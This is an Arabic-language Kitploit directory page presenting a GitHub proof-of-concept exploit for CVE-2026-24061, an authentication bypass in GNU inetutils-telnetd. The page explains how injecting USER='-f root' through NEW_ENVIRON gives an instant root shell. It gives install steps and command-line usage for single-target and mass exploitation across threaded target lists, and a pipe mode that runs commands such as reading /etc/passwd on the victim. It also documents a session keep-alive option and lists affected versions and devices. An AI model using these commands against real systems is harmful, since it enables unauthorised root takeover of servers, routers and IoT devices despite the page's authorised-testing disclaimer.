Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24061-PoC-Exploit — استغلال لتجاوز المصادقة عن بُعد لـ GNU inetutils-telnetd (CVE-2026-24061) باستخدام حقن CRLF للحصول على شل جذر فوري. يدعم الاستغلال الفردي/الجماعي، وتعدد الخيوط، والمنافذ المخصصة، ووضع الأنابيب، والحفاظ على استمرارية الجلسة. | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-24061-poc-exploit
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعدتطوير الحمولات
GitHubtc4dy/cve-2026-24061-poc-exploit

CVE-2026-24061-PoC-Exploit

استغلال لتجاوز المصادقة عن بُعد لـ GNU inetutils-telnetd (CVE-2026-24061) باستخدام حقن CRLF للحصول على شل جذر فوري. يدعم الاستغلال الفردي/الجماعي، وتعدد الخيوط، والمنافذ المخصصة، ووضع الأنابيب، والحفاظ على استمرارية الجلسة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
6منذ 2 أشهرلم تتم المراجعة بعد

CVE-2026-24061

🚀 CVE-2026-24061 - استغلال تجاوز المصادقة في GNU inetutils-telnetd

Python Bash License CVSS

إصدار GNU inetutils-telnetd - حقن CRLF لتجاوز المصادقة والحصول على شل جذر فوري

📌 نظرة عامة

يستغل هذا الاستغلال CVE-2026-24061، وهي ثغرة حرجة لتجاوز المصادقة عن بُعد في GNU inetutils-telnetd. من خلال حقن حمولة NEW_ENVIRON مصممة خصيصًا مع USER='-f root'، يتم تجاوز المصادقة والحصول على شل جذر فوري دون أي بيانات اعتماد.

ملاحظة: البرنامج النصي basic_exploit.sh هو نسخة مبسطة وأسرع من exploit.sh؛ ومع ذلك، يُنصح باستخدام exploit.sh للوظائف الكاملة.

🔥 الميزات الرئيسية

🎯 الإصدارات المتأثرة

المنتجالإصدارات
GNU inetutils-telnetd1.9.3 - 2.7
توزيعات لينكس المتأثرةDebian و CentOS و Ubuntu وتوزيعاتها. (Zorin OS و Linux Mint و Pop!_OS و Elementary OS)
الأجهزة المدمجةNAS و IoT والموجهات

⚠️ إخلاء مسؤولية: هذه الأداة مخصصة لاختبار الأمان المصرح به والأغراض التعليمية فقط. الوصول غير المصرح به غير قانوني.

📦 التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit
cd CVE-2026-24061-PoC-Exploit

# Python version
pip3 install -r requirements.txt

# Bash version
chmod +x exploit.sh
chmod +x basic_exploit.sh

🛠️ أمثلة الاستخدام

🎯 استغلال هدف واحد

root@kitploit:~
# Python version
python3 exploit.py -u 192.168.1.100

# Bash version
./exploit.sh -u 192.168.1.100
./basic_exploit.sh 192.168.1.100

🔧 منفذ ومستخدم مخصص

root@kitploit:~
# Custom port (non-standard telnet port)
python3 exploit.py -u 10.0.0.5 -p 2323

# Custom username injection
python3 exploit.py -u 10.0.0.5 -usr admin

📊 استغلال جماعي (متعدد الأهداف)

root@kitploit:~
# Create targets file
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt
echo "10.0.0.5:2323" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt -m 20

# Bash version
./exploit.sh -l targets.txt -m 20

📡 وضع الأنبوب (تنفيذ الأوامر)

root@kitploit:~
# Execute commands via pipe
echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100

# Multiple commands
echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100

⚙️ خيارات متقدمة

root@kitploit:~
# Verbose mode with debug output
python3 exploit.py -u 192.168.1.100 -v

# Custom timeout and retries
python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5

# Session keep-alive (maintain shell)
python3 exploit.py -u 192.168.1.100 --keep-alive

📊 وسائط سطر الأوامر

🔗 استغلالات ذات صلة

اطّلع على مستودعات الاستغلال الأخرى الخاصة بي:

  • CVE-2026-41940
  • CVE-2026-0073
  • CVE-2026-29000
تنزيل الأداة
الفئةالميزات
الاستغلال✅ تجاوز المصادقة عبر حقن CRLF
✅ شل جذر فوري
✅ حقن مستخدم مخصص (-f admin, -f user)
المسح✅ استغلال هدف واحد
✅ استغلال جماعي من ملف
✅ تعدد الخيوط (خيوط قابلة للتكوين)
✅ دعم منفذ مخصص
متقدم✅ وضع الأنبوب (تنفيذ الأوامر عبر stdin)
✅ إبقاء الجلسة نشطة
✅ آلية إعادة المحاولة
✅ التحكم في المهلة
سهولة الاستخدام✅ مخرجات ملونة (colorama)
✅ لغة مزدوجة (Python و Bash)
✅ وضع الإسهاب/التصحيح
المختصرالطويلالوصفالافتراضي
-u--urlعنوان IP الهدفمطلوب
-p--portمنفذ الهدف23
-l--listملف يحتوي على قائمة الأهدافلا شيء
-m--max-threadsالحد الأقصى للخيوط للاستغلال الجماعي10
-usr--usernameاسم المستخدم للحقنroot
-t--timeoutمهلة المقبس (بالثواني)10
-r--retriesعدد محاولات إعادة المحاولة3
-v--verboseتفعيل مخرجات التصحيحFalse
--keep-aliveإبقاء الجلسة نشطة بعد الاستغلالFalse